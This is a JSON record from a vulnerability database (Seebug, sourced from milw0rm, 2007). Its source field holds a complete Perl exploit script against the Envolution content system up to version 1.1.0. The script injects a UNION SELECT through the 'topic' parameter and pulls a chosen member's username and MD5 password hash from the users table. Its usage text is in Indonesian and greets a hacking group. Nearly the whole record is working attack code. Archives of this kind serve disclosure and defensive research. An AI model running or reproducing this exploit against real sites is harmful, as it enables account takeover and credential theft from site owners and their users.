{"lastseen": "2017-11-19T14:22:22", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T14:22:22", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:22:22", "rev": 2}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-64832", "references": [], "enchantments_done": [], "id": "SSV:64832", "title": "Envolution <= 1.1.0 (topic) Remote SQL Injection Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n #!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\n\r\nif(@ARGV &#60; 3)\r\n{\r\n usage();\r\n\r\n exit();\r\n}\r\n\r\n$site = $ARGV[0]; # Site Target\r\n$path = $ARGV[1]; # Path direktori envolution_1-0-1\r\n$usid = $ARGV[2]; # member id\r\n\r\n$www = new LWP::UserAgent;\r\n$sql = &#34;$site/$path/modules.php?op=modload&name=News&file=index&catid=&topic=2%20and%201=2%20union%20all%20select%201,2,3,concat(pn_uname,0x3a,pn_pass)%20from%20envo_users%20where%20pn_uid=$usid/*&#34;;\r\nprint &#34;\\n\\n [~] Mencari Username:Password(md5) member id = $usid \\n&#34;;\r\n$res = $www -&#62; get($sql) or err();\r\n$res -&#62; content() =~ /&#60;b&#62;(.*)&#60;\\/b&#62;/ or err();\r\nprint &#34;\\n [+] Username:Password(md5) member id = $usid \\n&#34;;\r\nprint &#34;\\n [&#62;] $1 \\n\\n&#34;;\r\n\r\nsub usage()\r\n{\r\nprint &#34;#############################################################\\n&#34;;\r\nprint &#34;# newhack[dot]org #\\n&#34;;\r\nprint &#34;#############################################################\\n&#34;;\r\nprint &#34;# Envolution &#60;= v1.1.0 Remote SQL Injection #\\n&#34;;\r\nprint &#34;# http://sourceforge.net/projects/envolution #\\n&#34;;\r\nprint &#34;# k1tk4t - newhack[dot]org - Indonesia #\\n&#34;;\r\nprint &#34;# cara penggunaan: enov.pl [site] [path] [member id] #\\n&#34;;\r\nprint &#34;# contoh: enov.pl http://localhost /html 2 #\\n&#34;;\r\nprint &#34;#-----------------------------------------------------------#\\n&#34;;\r\nprint &#34;# Thanks to; str0ke, xoron, y3dips, #\\n&#34;;\r\nprint &#34;# newhack[dot]org staff dan member #\\n&#34;;\r\nprint &#34;# mR.opt1lc,fusion,PusHm0v,Ghoz,fl3xu5,bius,iind_id,slackX #\\n&#34;;\r\nprint &#34;# Semua Komunitas Hacker dan Sekuriti Indonesia; #\\n&#34;;\r\nprint &#34;#############################################################\\n&#34;;\r\n}\r\n\r\nsub err()\r\n{\r\nprint &#34;\\n [-] Exploit gagal :( - cari yang lain!&#34;;\r\nexit();\r\n}\r\n\r\n# milw0rm.com [2007-08-05]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-64832", "type": "seebug", "immutableFields": []}

{}